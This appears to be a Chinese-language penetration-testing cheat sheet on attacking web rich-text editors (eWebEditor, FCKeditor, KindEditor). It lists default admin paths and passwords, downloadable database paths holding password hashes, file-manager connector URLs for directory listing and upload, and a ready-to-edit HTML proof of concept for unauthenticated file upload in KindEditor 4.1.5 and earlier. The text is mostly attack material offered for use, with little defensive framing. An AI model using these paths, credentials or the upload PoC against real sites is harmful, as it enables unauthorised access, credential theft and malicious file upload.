编辑器分类:ewebeditor、kindeditor、ckeditor、fckeditor、Cute Editor、ueditor、southidceditor等等

一、ewebeditor编辑器(数据库路径、文件上传、目录遍历、SQL注入等)

(1)漏洞1

Admin_Login.asp         登录页面

Admin_Default.asp         管理首页

Admin_Style.asp         样式页面

Admin_UploadFile.asp         上传文件页面

Upload.asp         上传文件业

Admin_ModiPwd.asp         密码

eWebEditor.asp         数据库文件

ewebeditor /db/ewebeditor.mdb         默认数据库路径

ewebeditor 2.8.0        版本以前为默认后台路径:

ewebeditor/admin_login.asp        版本默认后台路径:

admin/login.asp,或admin/editor/login_admin.asp

admin admin/admin888         默认账户密码

其他常用密码admin admin999 admin1 admin000

(2)漏洞2

若后台使用默认用户名和密码无法登录。可以尝试直接下载:

../db/ewebeditor.mdb或者 ../db/ewebeditor.asp ,

ewebeditor/db/ewebeditor.asa

ewebeditor/db/ewebeditor.asp

ewebeditor/db/#ewebeditor.asa

ewebeditor/db/#ewebeditor.mdb

ewebeditor/db/!@#ewebeditor.asp

ewebeditor/db/ewebeditor1033.mdb

用户名和密码在eWebEditor_System表中,经过md5加密

 很多管理员常改.asp后缀,一般访问.asp .asa 后缀的都是乱码!可以用下载工具下载下来,然后更改后缀为.mdb来查看内容!

二、FCKeditor编辑器(文件上传、解析漏洞)

一、查看版本

/fckeditor/editor/dialog/fck_about.html

/FCKeditor/_whatsnew.html

二、文件上传地址(结合解析漏洞)

FCKeditor/editor/filemanager/browser/default/connectors/test.html(2.4.3)

FCKeditor/editor/filemanager/upload/test.html(2.4.3)

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

三、示例页面

FCKeditor/_samples/default.html(2.4.3)

FCKeditor/_samples/asp/sample01.asp(2.4.3)

FCKeditor/_samples/asp/sample02.asp(2.4.3)

FCKeditor/_samples/asp/sample03.asp(2.4.3)

FCKeditor/_samples/asp/sample04.asp(2.4.3)

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

四、更多

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?

Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (2.6.3)

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/connectors/test.html(2.6.6)

FCKeditor/editor/filemanager/connectors/uploadtest.html(2.6.6)

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.js

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php

三、kindeditor漏洞(文件上传)

1.查看版本信息(前提:kindeditor<=4.1.5)

http://www.xxx/kindeditor//kindeditor.js        (一般默认)

2.版本是4.1.10可以进行尝试如下路径是否存在有必要验证文件 upload_json.* 

kindeditor/asp/upload_json.asp?dir=file

kindeditor/asp/upload_json.ashx?dir=file

kindeditor/jsp/upload_json.jsp?dir=file

kindeditor/php/upload_json.php?dir=file

3.如下图可以看出是存在jsp上传点:

http://www.xxx/kindeditor/jsp/upload_json.jsp?dir=file

4.写出下面的构造上传poc,这里需要修改<script>...<script>以及url : 的内容,根据实际情况修改.

<html><head>

<title>Uploader</title>

<script src="http://www.xxx/kindeditor//kindeditor.js"></script>

<script>

KindEditor.ready(function(K) {

var uploadbutton = K.uploadbutton({

button : K('#uploadButton')[0],

fieldName : 'imgFile',

url : 'http://www.xxx/kindeditor/jsp/upload_json.jsp?dir=file',

afterUpload : function(data) {

if (data.error === 0) {

var url = K.formatUrl(data.url, 'absolute');

K('#url').val(url);}

},

});

uploadbutton.fileBox.change(function(e) {

uploadbutton.submit();

});

});

</script></head><body>

<div class="upload">

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

<input type="button" id="uploadButton" value="Upload" />

</div>

</body>

</html>

5.用浏览器打开,然后开启bupsuit进行拦截发送,可以看到成功上传txt文件。

文章部分转载:kindeditor<=4.1.5上传漏洞复现 - 渗透测试中心 - 博客园

更多推荐

编辑器漏洞(配合文件上传等)